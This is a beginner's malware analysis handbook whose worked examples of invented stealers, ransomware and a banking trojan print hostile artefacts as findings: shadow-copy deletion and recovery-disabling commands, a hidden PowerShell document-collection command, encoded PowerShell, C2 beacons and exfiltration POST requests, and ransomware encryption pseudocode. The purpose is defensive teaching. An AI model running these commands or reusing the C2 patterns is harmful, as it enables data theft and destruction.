MALWARE ANALYSIS HANDBOOK FOR BEGINNERS

INTRODUCTION

Malware analysis is the process of studying malicious software to understand its

functionality, origin, and potential impact. This handbook provides beginners with a
structured approach to malware analysis, complete with practical examples and
techniques.

THE MALWARE ANALYSIS PROCESS

1. INITIAL ANALYSIS (STATIC ANALYSIS)

Definition: Examining malware without executing it to gather preliminary information.

Static analysis involves examining a malware sample without executing it, to understand
its structure, behavior, and intent. Analysts inspect code, strings, headers, and metadata
using tools like IDA Pro, Ghidra, or strings.exe. This technique helps identify hardcoded
IPs, domains, suspicious function calls, and file properties — all without the risk of
triggering the malware.

Why It’s Useful:

• Safe – No need to run the malware, so it's less risky.

• Quick Wins – Reveals indicators like IP addresses, domains, file paths, or

suspicious strings.

• Foundation for Deeper Analysis – Sets the stage for dynamic analysis and
behavior profiling.

Common Static Analysis Techniques:

• File Inspection: Examine headers (PE/ELF), file size, hashes (MD5/SHA256), etc.

• String Analysis: Use tools like strings, BinText, or FlareVM to extract readable text
that may reveal C2 servers, commands, or error messages.

• Disassembly: Analyze code without executing it using tools like Ghidra, IDA Pro, or
Radare2.

• PE Analysis: Use tools like PEview, CFF Explorer, or Detect It Easy (DIE) to check
import tables, sections, and compiled timestamps.
 • Obfuscation Checks: Identify packing or encryption methods used to hide
malicious content.

What to Look For:

• Hardcoded IP addresses or domains

• Suspicious API calls (e.g., CreateRemoteThread, VirtualAlloc)
• Unusual section names or compressed/encrypted code
• Embedded credentials, commands, or file names

Tools:

• File hashing utilities (MD5, SHA-1, SHA-256)

• Strings utility

• PE Explorer

• ExeInfo PE

• PPEE (Puppy PE)

• VirusTotal,

• PEStudio,

• DIE,

• IDA Free,

• Ghidra

2. DYNAMIC ANALYSIS (BEHAVIORAL ANALYSIS)

Definition: Running malware in a controlled environment to observe its behavior.

Dynamic analysis involves executing the malware in a controlled environment to

observe its real-time behavior. This allows analysts to uncover actions that can’t be seen in
static analysis, such as how the malware interacts with the system, network, or registry.

Why It’s Useful:

• Reveals Actual Behavior – See what the malware really does, not just what it’s
coded to do.

• Detects Evasion – Many malware variants act differently when executed (e.g.,
delaying execution, detecting sandboxes).
 • Extracts IOCs (Indicators of Compromise) – Get live data like file modifications,
created processes, network traffic, etc.

Common Dynamic Analysis Activities:

• Running in a Sandbox: Use tools like Any.Run, Cuckoo Sandbox, or Joe Sandbox
to safely run the malware and record its behavior.

• Process Monitoring: Track process creation, injection, and termination using tools
like Process Monitor (ProcMon) or Process Explorer.

• Network Monitoring: Capture outgoing connections, DNS requests, or downloads

using Wireshark, Fiddler, or TCPView.

• Registry and File Monitoring: Detect changes to the system using Regshot,
ProcMon, or Filemon.

Tools:

• Cuckoo Sandbox

• ANY.RUN

• VMware/VirtualBox (isolated VMs)

• Wireshark (network analysis)

• Process Monitor/Process Explorer

• Volatility (memory analysis)

What to Look For:

• Hardcoded IP addresses or domains

• Suspicious API calls (e.g., CreateRemoteThread, VirtualAlloc)
• Unusual section names or compressed/encrypted code
• Embedded credentials, commands, or file names

3. CODE ANALYSIS (REVERSE ENGINEERING)

Code analysis, often called reverse engineering, involves digging deep into the actual
instructions the malware executes — by disassembling or decompiling the binary. This
allows analysts to understand the inner workings, logic, and intentions of the malware.

Why It’s Useful:

 • Reveals Hidden Logic – Understand what the malware is doing at a low level, even
if it's obfuscated or packed.

• Bypasses Obfuscation – Can uncover encrypted strings, hidden functions, or

custom protocols.

• Enables Signature Creation – Essential for writing YARA rules, AV signatures, or

developing patches.

• Essential for APTs and Advanced Malware – Many sophisticated threats require
reverse engineering to fully understand.

Common Code Analysis Techniques:

• Disassembly – View the raw assembly instructions (e.g., with IDA Pro, Ghidra, or
Radare2).

• Decompilation – Reconstruct higher-level code (C-like) to make logic more

readable.

• Control Flow Analysis – Trace how the program branches, loops, and calls
functions.

• String Decryption – Identify and decode hardcoded or encrypted strings.

• Debugging – Use tools like x64dbg or OllyDbg to step through code in real time and
observe behavior.

• API Call Analysis: Study interactions with system functions

Popular Tools:

• Ghidra – Free, powerful reverse engineering suite from the NSA

• IDA Pro / IDA Free – Industry-standard disassembler

• x64dbg / OllyDbg – Interactive debuggers

• Cutter – GUI for Radare2, beginner-friendly

• Binary Ninja – Lightweight and scriptable disassembler

• dnSpy – For analyzing .NET malware

• Uncompyle6 / pyinstxtractor – For Python-based malware

• Radare2
What to Look For:

• Custom encryption or packing routines

• C2 communication logic

• Exploit code or injection techniques

• String decoding functions

• Anti-analysis and anti-debug tricks (e.g., IsDebuggerPresent(), timing checks)

Pro Tip: Code analysis is the most advanced part of malware analysis — focus on building
your assembly and debugging skills gradually.

4. REPORTING AND INTELLIGENCE

Definition: Documenting findings and sharing actionable intelligence.

Reporting and intelligence is the final but crucial stage of malware analysis. It transforms
technical findings into actionable insights for defenders, leadership, and threat intel
teams. A good report helps drive better detection, response, and long-term defense
strategies.

Why It’s Important:

• Communicates Risk Clearly – Translates technical data into business impact.

• Enables Defense Improvements – Supports writing detections, tuning SIEM rules,

or updating EDR tools.

• Feeds Threat Intelligence – Contributes to understanding attacker behavior, TTPs,

and campaigns.

Key Components of a Good Malware Report:

• Summary – High-level overview (who, what, when, impact)

• Technical Analysis – Static, dynamic, and code analysis findings

• IOCs (Indicators of Compromise) – IPs, hashes, domains, filenames, mutexes

• MITRE ATT&CK Mapping – Tactics and techniques used

• Screenshots / Logs / Graphs – Visual evidence for clarity

• Mitigation Strategies: Recommendations for detection and remediation

 • Attribution Information: Potential threat actors or campaigns

• Recommendations – Containment, detection, remediation steps

Useful Tools & Platforms:

• MISP – Share and manage threat intel

• TheHive – Case management and report generation

• Jira / Confluence / Notion – Documentation platforms

• Markdown / LaTeX / Word – For formal reports

• STIX/TAXII – Standards for structured threat intelligence sharing

Where the Intel Goes:

• SIEMs and SOARs for alerting and automation

• Threat feeds and enrichment platforms

• Cyber threat intelligence teams and public reports (e.g., blogs, ISACs)

Safety Precautions

1. Isolated Environment: Always analyze malware in isolated virtual machines with

no internet access (or controlled access).

2. Snapshots: Take VM snapshots before analysis for easy rollback.

3. Host Protection: Ensure host system has adequate protection.

4. Network Segregation: Use a separate network for analysis activities.

5. Data Handling: Treat all outputs from malware as potentially malicious.

Pro Tip: Always tailor your report to the audience — execs need a risk summary, defenders
need IOCs, and CTI teams want TTPs and context.

SETTING UP A MALWARE ANALYSIS LAB

Basic Lab Requirements:

1. Host System: Well-protected computer with adequate resources

2. Virtualization Software: VMware Workstation/Player or VirtualBox

 3. Analysis VMs: Windows and Linux VMs for malware execution

4. Analysis Tools: Static, dynamic, and code analysis tools

5. Network Controls: Virtual network configurations, optional IDS/IPS

Creating Analysis VM:

1. Install a clean OS (Windows/Linux)

2. Install required analysis tools

3. Configure system for analysis (disable automatic updates, etc.)

4. Take a clean snapshot

5. Disable shared folders and other connections to host

PRACTICAL EXAMPLE: ANALYZING "DATATHIEF" MALWARE

Scenario:

A suspicious executable named "Product_invoice_details.exe" was received as an email

attachment. Users report strange system behavior after opening it.

Step 1: Initial Static Analysis

• File Name: invoice_details.exe

• Size: 256 KB
• MD5: 7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d
• SHA-256:
8f7e6d5c4b3a291e8d7c6b5a4c3d2e1f0a9b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4
• File Type: Win32 EXE
• Compiled: 2023-09-15 08:42:11

Strings Analysis Results:

Revealed suspicious artifacts:

• C:\ProgramData\system32backup\svchost.exe
• HKCU\Software\Microsoft\Windows\CurrentVersion\Run
• Connect: ftp.databackup-secure.net
• User: anonymous
• Pass: [email protected]
• GET /updates/security.dat
 • PowerShell Exfiltration: powershell.exe -WindowStyle Hidden -Command "Get-
Content -Path 'C:\Users\*\Documents\*.doc' | Out-File -FilePath
'C:\ProgramData\temp.dat'"

Observations:

• Attempts to disguise as a legitimate invoice file

• Potential persistence via registry
• FTP and HTTP-based C2 communication
• PowerShell used to read documents and store data locally — likely for exfiltration

Step 2: Dynamic Analysis

System Changes:

• Creates directory: C:\ProgramData\system32backup\

• Copies itself as: C:\ProgramData\system32backup\svchost.exe

• Modifies registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemBackup

• Creates file: C:\ProgramData\temp.dat

Network Activity:

• DNS resolution for ftp.databackup-secure.net

• FTP connection attempt to 192.168.1.100:21

• HTTP GET request to http://192.168.1.100/updates/security.dat

• Data upload to http://192.168.1.100/collect.php

Process Activity:

• Spawns PowerShell process with hidden window

• Creates scheduled task "System_Maintenance" to run daily

Step 3: Code Analysis

Disassembly Findings:

• Uses Win32 API functions: CreateFile, WriteFile, RegSetValueEx

• Contains encrypted configuration section (XOR with key 0x7A)

 • Employs anti-debugging techniques (IsDebuggerPresent checks)

• Includes keylogging functionality targeting browser windows

• Screenshots capture mechanism triggered every 30 seconds

Configuration Extraction (Decrypted):

"c2": {

"primary": "ftp.databackup-secure.net",

"fallback": "192.168.1.100"

},

"exfil": {

"documents": true,

"screenshots": true,

"keystrokes": true

},

"persistence": {

"registry": true,

"task": true

Step 4: Reporting

Malware Classification:

• Type: Information Stealer / Trojan

• Family: Likely custom or low-prevalence; no exact AV match

Capabilities Summary:

• Document Theft: via PowerShell script targeting user documents

• Keylogging: Monitors user input in browsers

• Screenshots: Periodic screen captures

• Persistence: Registry + Scheduled Task

• C2 Communication: FTP (for download/upload) and HTTP fallback

Intelligence Insights:

• Likely Goal: Data exfiltration of sensitive documents and user behavior

• Potential Attribution: Unknown; FTP with generic credentials may indicate

commodity malware or script kiddie level

MITRE ATT&CK Mapping:

o T1059.001 – PowerShell

o T1056.001 – Keylogging

o T1113 – Screen Capture

o T1053.005 – Scheduled Task

o T1105 – Ingress Tool Transfer

Recommendations:

• Isolate affected hosts

• Block IOC domains/IPs at firewall/proxy

• Hunt for registry key and dropped files

• Reimage affected endpoints

• Update detection rules for FTP use and unusual PowerShell patterns

INDICATORS OF COMPROMISE (IOCS):

• File Hash:
8f7e6d5c4b3a291e8d7c6b5a4c3d2e1f0a9b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4
 • Domain: ftp.databackup-secure.net

• IP Address: 192.168.1.100

• Registry Key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemBackup

• File Path: C:\ProgramData\system32backup\svchost.exe

• Scheduled Task: System_Maintenance (Runs daily)

Mitigation Recommendations:

1. Block communication to identified domains and IPs

2. Remove registry persistence keys

3. Delete malicious files and scheduled tasks

4. Scan system for additional compromises

5. Update security software with identified IOCs

ADVANCED ANALYSIS EXAMPLE: "RANSOMLOCK" RANSOMWARE

Initial Analysis

File Properties:

File Name: security_update1.exe

Size: 512 KB

SHA-256: 2a1b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b

Timestamp: 2023-10-27

Strings Analysis (Partial):

.rsm

Your files have been encrypted!

Bitcoin address: bc1q9h7j8k5l6m7n8p9q0r1s2t3u4v5w6x7y8z9a

Contact: [email protected]
 AES-256-CBC

CreateEncryptionKey

FindFirstFile

CryptEncrypt

Packer Detection:

• UPX packing detected

• Custom obfuscation layer present

DYNAMIC ANALYSIS

Behavioral Findings:

• Deletes Volume Shadow Copies: vssadmin delete shadows /all /quiet

• Disables Windows recovery mode: bcdedit /set recoveryenabled No

• Drops ransom note as "RECOVERY.txt" on desktop

• Encrypts files with extensions: .doc, .pdf, .jpg, .xls, etc.

• Adds ".rsm" extension to encrypted files

Network Activity:

• Connects to TOR network via embedded TOR client

• Communicates with .onion address: r2d2c3p0.onion

• Sends system information and encryption key data

Registry Modifications:

• Adds startup entry for persistence

• Modifies Windows Defender exclusions

• Disables task manager via registry

CODE ANALYSIS

Encryption Mechanism:

// Pseudocode of encryption routine

function EncryptFile(filePath) {

randomKey = GenerateRandomAESKey(32); // 256 bits

encryptedFile = AES_CBC_Encrypt(ReadFile(filePath), randomKey);

publicKey = ReadEmbeddedRSAPublicKey();

encryptedKey = RSA_Encrypt(randomKey, publicKey);

WriteFile(filePath + ".rsm", encryptedFile + encryptedKey);

DeleteFile(filePath);

Anti-Analysis Techniques:

• Timing checks for sandbox detection

• VM detection via registry checks

• Sleep calls between operations

• Process injection for persistence

REPORTING

Classification: Ransomware with data destruction capabilities

Technical Summary: RansomLock employs a hybrid encryption scheme using AES-256 for
file encryption and RSA for key protection. It destroys recovery mechanisms and
establishes communication through TOR. The malware performs basic system
reconnaissance before encryption and targets multiple file types.
IOCs:

• File Hash:
2a1b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b

• Bitcoin Address: bc1q9h7j8k5l6m7n8p9q0r1s2t3u4v5w6x7y8z9a

• TOR Address: r2d2c3p0.onion

• Email: [email protected]

• File Marker: .rsm extension

Recovery Options:

1. Restore from clean backups (recommended)

2. Check for decryptors from security researchers

3. Do NOT recommended paying ransom

USING CUCKOO SANDBOX FOR MALWARE ANALYSIS

Cuckoo Sandbox is an automated malware analysis system that provides detailed reports
on malware behavior.

Basic Workflow:

1. Submit Sample:

2. cuckoo submit /path/to/suspicious_file.exe

3. View Results:

4. cuckoo web

5. Analyze Report:

o Process tree

o File operations

o Registry modifications

o Network activity

o API call sequences

Example Cuckoo Report (BankingTrojan):

"behavior": {

"processes": [

"process_name": "suspicious_file.exe",

"pid": 1234,

"children": [

"process_name": "cmd.exe",

"command_line": "cmd.exe /c powershell.exe -e JABkAGEAdABhAD0ARQB..."

],

"files": [

"path": "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe",

"action": "created"

],

"registry": [

{
 "key":
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemService",

"value": "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe",

"action": "set"

],

"network": {

"http": [

"host": "banking-update-server.com",

"uri": "/config.php",

"method": "POST",

"data": "id=VICTIM-PC&os=Windows+10"

],

"dns": [

"request": "banking-update-server.com",

"answers": [

"type": "A",

"data": "45.77.123.45"

]
 }

MALWARE BEHAVIOR ANALYSIS REPORT

Summary:

A suspicious binary (suspicious_file.exe) was observed performing malicious actions

including encoded PowerShell execution, file creation for persistence, and network
communication with a Command & Control (C2) server. This behavior suggests an attempt
to establish long-term access and exfiltrate system metadata.

Detailed Behavioral Analysis

1. Process Activity

• Parent Process:

o Name: suspicious_file.exe

o PID: 1234

• Child Process:

o Name: cmd.exe

o Command Line: cmd.exe /c powershell.exe -e JABkAGEAdABhAD0ARQB...

▪ Executes PowerShell with Base64-encoded payload (typical

obfuscation method).

▪ Suggests malicious scripting to download or execute further

payloads in memory.

Interpretation: The attacker uses command-line obfuscation to bypass AV/EDR detection

and execute PowerShell stealthily.

2. File System Activity

• File Created:
 o Path: C:\Users\Admin\AppData\Roaming\svchost.exe

o Action: created

Interpretation: A malicious executable is dropped in a user-accessible directory but

masquerades as a trusted Windows binary (svchost.exe) to avoid suspicion and blend into
the environment.

3. Registry Modification

• Registry Key Set:

o Path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemService

o Value: C:\Users\Admin\AppData\Roaming\svchost.exe

Interpretation: The malware achieves persistence by setting a Run key in the registry. This
ensures execution on every user logon, a common tactic used by commodity malware.

4. Network Activity

• DNS Request:

o Domain: banking-update-server.com

o Resolved IP: 45.77.123.45

• HTTP Communication:

o Method: POST

o Host: banking-update-server.com

o URI: /config.php

o Payload: id=VICTIM-PC&os=Windows+10

Interpretation:

• Malware contacts a remote C2 server, likely to report initial infection.

• Sends basic reconnaissance data (hostname + OS version) — often used for

profiling the victim or staging future payloads.

• The .php endpoint implies possible interaction with a C2 panel or backend for
attacker control.
ANALYST SUMMARY

Malware Classification:

• Type: Trojan / Initial Access Payload

• TTPs Observed:

o T1059.001 – PowerShell Execution

o T1547.001 – Registry Run Key Persistence

o T1105 – Ingress Tool Transfer

o T1071.001 – Web-based C2 Communication

Recommendations:

• Isolate affected host(s) immediately

• Block the domain banking-update-server.com and IP 45.77.123.45 at firewall and

proxy

• Hunt for registry persistence key and dropped executable

• Reset user credentials if suspicious access is suspected

• Reimage system or remove persistence mechanisms and dropped binaries

manually

• Add detection rules for:

o PowerShell base64 encoding

o Suspicious file creation in Roaming

o Outbound POST to suspicious PHP URIs

USING WIRESHARK FOR NETWORK TRAFFIC ANALYSIS

When analyzing malware, network traffic analysis provides crucial insights into
communication patterns and data exfiltration.

Basic Workflow:

1. Start Capture:
 o Launch Wireshark

o Select network interface

o Start packet capture

2. Execute Malware:

o Run the malware in isolated environment

3. Stop Capture:

o After sufficient activity, stop the capture

o Save to PCAP file

4. Analyze Traffic:

o Apply filters to isolate suspicious traffic

o Follow TCP streams for complete conversations

Example: Analyzing "DataSpy" Malware Network Traffic

HTTP Traffic Filter: http

Suspicious Request:

GET /gate.php?id=DS195&sys=WINPC&ver=10.0 HTTP/1.1

Host: data-analytics-portal.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

Cookie: session=7365637265745f73657373696f6e5f6964

Follow TCP Stream:

Client: GET /gate.php?id=DS195&sys=WINPC&ver=10.0 HTTP/1.1

Host: data-analytics-portal.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

 Cookie: session=7365637265745f73657373696f6e5f6964

Server: HTTP/1.1 200 OK

Content-Type: text/plain

Content-Length: 112

{"tasks":[{"id":1,"cmd":"collect_browser","target":"chrome"},{"id":2,"cmd":"screenshot",
"interval":300}]}

DNS Analysis Filter: dns

DNS Queries:

• Standard query 0x1234 A data-analytics-portal.com

• Standard response 0x1234 A data-analytics-portal.com A 23.45.67.89

Data Exfiltration Filter: http.request.method == "POST"

Exfiltration Request:

POST /upload.php HTTP/1.1

Host: data-analytics-portal.com

Content-Type: multipart/form-data; boundary=----

WebKitFormBoundary7MA4YWxkTrZu0gW

Content-Length: 45678

------WebKitFormBoundary7MA4YWxkTrZu0gW

Content-Disposition: form-data; name="id"

DS195
 ------WebKitFormBoundary7MA4YWxkTrZu0gW

Content-Disposition: form-data; name="type"

browser_data

------WebKitFormBoundary7MA4YWxkTrZu0gW

Content-Disposition: form-data; name="data"; filename="chrome_data.zip"

Content-Type: application/zip

[Binary data]

------WebKitFormBoundary7MA4YWxkTrZu0gW--

"DataSpy" is a malicious agent designed to exfiltrate sensitive browser data and user
screenshots. The malware uses HTTP-based Command and Control (C2) communication
and uploads data via multipart form POST requests. Below is a breakdown of its network
behavior captured during dynamic analysis.

1. HTTP Command & Control (C2) Communication

HTTP GET Request:

Filter Used: http

Captured Request:

GET /gate.php?id=DS195&sys=WINPC&ver=10.0 HTTP/1.1

Host: data-analytics-portal.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

Cookie: session=7365637265745f73657373696f6e5f6964

Analysis:

• Endpoint: /gate.php — typical for C2 command polling

 • Query Parameters:

o id=DS195: Likely the victim's unique identifier

o sys=WINPC: System type

o ver=10.0: OS version

• Cookie value: Hex-encoded string, possibly used for session tracking

Server Response:

HTTP/1.1 200 OK

Content-Type: text/plain

Content-Length: 112

{"tasks":[{"id":1,"cmd":"collect_browser","target":"chrome"},{"id":2,"cmd":"screenshot",
"interval":300}]}

Decoded Tasks:

• Task 1: Collect Chrome browser data

• Task 2: Capture screenshots every 300 seconds

Interpretation: The malware checks in to receive instructions from the attacker in

structured JSON format, indicating an organized C2 infrastructure.

2. DNS Resolution Activity

Filter Used: dns

DNS Logs:

Query: data-analytics-portal.com

Response: A record → 23.45.67.89

Analysis:

• Malware resolves its C2 domain dynamically.

• Indicates host-based IOC: data-analytics-portal.com → 23.45.67.89

• Domain appears benign in name, aiding in bypassing detection filters

Recommendation: Block both domain and resolved IP at network perimeter.

3. Data Exfiltration

Filter Used: http.request.method == "POST"

POST Request Details:

POST /upload.php HTTP/1.1

Host: data-analytics-portal.com

Content-Type: multipart/form-data; boundary=----

WebKitFormBoundary7MA4YWxkTrZu0gW

Payload Analysis:

• Multipart sections include:

o id=DS195 – Victim ID

o type=browser_data

o data=chrome_data.zip – ZIP file attachment (binary browser data)

Interpretation: Exfiltration is well-structured, using legitimate-looking POST behavior with

standard Content-Type. This tactic blends in with normal web traffic, complicating
detection.

Overall Findings

Category Observation

C2 JSON-based tasking via /gate.php endpoint

Communication
 Data Theft ZIP archive upload via POST to /upload.php

Evasion Use of common headers, hex-encoded cookies, and generic

domain name

Persistence Maintains session using browser-style cookies

Indicators data-analytics-portal.com, 23.45.67.89, encoded cookie session

string

Recommendations

1. Block & Sinkhole the domain data-analytics-portal.com and IP 23.45.67.89

2. Detect suspicious HTTP GET requests with gate.php pattern

3. Alert on multipart/form-data POST requests to uncommon endpoints like

/upload.php

4. Hunt for session cookies with encoded identifiers

5. Enforce proxy-layer inspection to detect hidden exfiltration channels

6. Tag indicators in threat intel platforms (MISP, OpenCTI, etc.)

MEMORY FORENSICS WITH VOLATILITY

Objective:

Investigate suspicious behavior tied to suspicious.exe using memory forensics.

Steps & Findings

1. Memory Acquisition

• Tool used: WinPmem

• Command: winpmem_x64.exe memory.raw

2. Process Analysis

Command: volatility -f memory.raw --profile=Win10x64_19041 pslist

Suspicious process found:

• Name: suspicious.exe

• PID: 3672

• Parent: explorer.exe

3. DLL Analysis

Command: volatility -f memory.raw --profile=Win10x64_19041 dlllist -p 3672

Loaded DLLs:

• inj3ct.dll found in temp folder — likely malicious.

4. Network Activity

Command: volatility -f memory.raw --profile=Win10x64_19041 netscan

5. Memory Dump + Strings

Command: volatility -f memory.raw --profile=Win10x64_19041 memdump -p 3672 -D

output/ strings output/3672.dmp

Indicators found:

• Creates admin account: admin_backup

• Keylogger function: GetAsyncKeyState

• Screenshot feature: screenshot_interval=60

• Data exfil: SendDataToServer

Summary (Findings)

• Process Name: suspicious.exe

• DLL Found: inj3ct.dll (loaded from temp directory)

• Network: Established C2 connections with external IPs (via ports 443 and 80)

• Persistence:

o Registry autorun entry: HKCU\...\Run\SystemService

o DLL injection technique used

 • Capabilities:

o Keylogging (GetAsyncKeyState)

o Screenshot capture every 60 seconds

o Privilege escalation (creates admin account admin_backup)

o Data exfiltration via HTTP POST

Recommendations

1. Isolate the Infected System

Immediately disconnect the affected endpoint from the network to prevent further
data exfiltration.

2. Terminate Malicious Processes

Kill the suspicious.exe process and any associated child processes (e.g., injected
PowerShell, cmd.exe).

3. Remove Persistence Mechanisms

o Delete registry entry:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemService

o Remove inj3ct.dll and any related binaries from temp or startup locations.

4. Reset User Credentials

Change passwords for impacted user accounts and remove the unauthorized
admin_backup account.

5. Review and Block C2 Domains/IPs

o Block outbound access to domains like data-analytics-portal.com

o Add related IPs (e.g., 23.45.67.89, 104.18.22.56) to firewall/DNS blacklists.

6. Conduct Full Malware Scan

Run updated antivirus and EDR tools across the environment for full scope
detection.

7. Collect and Preserve Evidence

Save memory dumps, logs, and artifacts for deeper investigation or potential legal
use.
 8. Apply System Patching
Ensure OS and applications are up to date to prevent exploitation of known
vulnerabilities.

9. Enhance Monitoring
Enable logging for registry changes, unusual process behavior, and outbound traffic
to unknown domains.

10. User Awareness Training

Reinforce phishing awareness and safe attachment handling with affected teams.

ANALYSIS SUMMARY:

• Suspicious process injects code into legitimate notepad.exe

• Uses custom DLL (inj3ct.dll) loaded from temp directory

• Establishes encrypted connection to C2 server

• Contains commands to create backdoor admin account

• Implements keylogging and screenshot functionality

CONCLUSION

Malware analysis requires a methodical approach combining static, dynamic, and code
analysis techniques. By following the structured methodology outlined in this handbook,
beginners can develop the skills needed to identify, understand, and mitigate malicious
software threats.

Remember that malware analysis should always be conducted in secure, isolated

environments to prevent accidental infections. As threats evolve, continuous learning and
tool familiarity are essential for effective analysis.

ADDITIONAL RESOURCES

• Books:

o "Practical Malware Analysis" by Michael Sikorski and Andrew Honig

o "The Art of Memory Forensics" by Michael Hale Ligh et al.

o "Malware Analyst's Cookbook" by Michael Hale Ligh et al.

• Online Resources:

o SANS FOR610: Reverse-Engineering Malware

o OALabs YouTube Channel

o Hacker’s Sploits YouTube Channel - Malware Analysis Series

o Malware Traffic Analysis

o VirusTotal

o Hybrid Analysis

• Communities:

o MalwareTech Forums

o Reddit r/ReverseEngineering

o Twitter #MalwareAnalysis community